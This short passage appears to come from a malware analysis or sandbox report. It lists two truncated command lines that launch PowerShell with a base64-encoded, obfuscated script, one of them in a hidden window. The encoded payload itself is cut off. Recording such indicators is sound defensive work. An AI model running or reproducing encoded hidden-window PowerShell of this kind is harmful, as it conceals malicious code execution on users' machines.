Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...' (with a hidden window)